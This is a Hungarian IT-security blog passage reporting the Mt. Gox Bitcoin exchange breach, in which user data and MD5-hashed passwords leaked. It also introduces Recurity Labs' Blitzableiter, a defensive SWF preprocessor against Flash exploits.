Több mint 60.000 BitCoin felhasználó adatai, köztük MD5-tel hashelt jelszavuk került nyilvánosságra az Mt. Gox nevű kereskedőcéget ért támadás következtében. Az egyik jelentős mennyiségű virtuális valutával rendelkező felhasználó fiókjából a támadók megpróbáltak nagyobb össeget értékesíteni, de a napi limit miatt csak 1000$-nak megfelelő BitCoint sikerült eladni, ez persze nem vigasztalja a zuhanásnak indult árfolyamon vesztőket. Az Mt. Gox ígérete szerint vissza fogja vonni az incidens óta lezajlott tranzakciókat, ami az árfolyam normalizálódásához fog vezetni, bár ennek a lépésnek sem mindenki örül. 

Az incidens jól mutatja, hogy a BitCoin tényleg kezd valódi tényezővé válni az interneten.

(Köszönet Jaklevnek és Tyr43lnek az infókért!)

Aki követi az It-biztonsági eseményeket, annak nem lehet újdonság, hogy az Adobe Flash Player nem a világ legbiztonságosabb alkalmazása. Másrészt remélem az sem újdonság senkinek, hogy a nagy incidensek, ipari és nem ipari kémakciók kiindulópontja általában valamilyen kliens oldali sebezhetőség. 

De mit lehet tenni, ha nem tudjuk megtiltani a Flash használatát, mégis szeretnénk elkerülni a 0-day támadásokat? A Recurity Labs válasza a kérdésre a Blitzableiter (villámhárító), melynek most jelent meg az 1.0-ás változata. A Blitzableiter lényegében egy SWF előfeldolgozó. A szoftver gyakorlatilag újraépíti a megbízhatatlan forrásból származó SWF fájlokat, szigorúan tarva magát a specifikációhoz, valamint bevezet egy sor hiányzó biztonsági funkciót. Az eredeti, potenciálisan veszélyes fájl tehát soha nem éri el a lejátszót.

Pontosabb részletekért, és egyébként is erősen ajánlot a Defending the Poor című előadás a 2009-es CCC-ről (nem ágyazom be, mert 8 részben van a YouTube-on). A prezentáció egyébként sírva-röhögős, és arra is jól rámutat, hogy miért ódzkodnak egyesek a Flashtől.

Friss: A legújabb hírek szerint az RSA-hoz is egy Flash exploittal mentek be.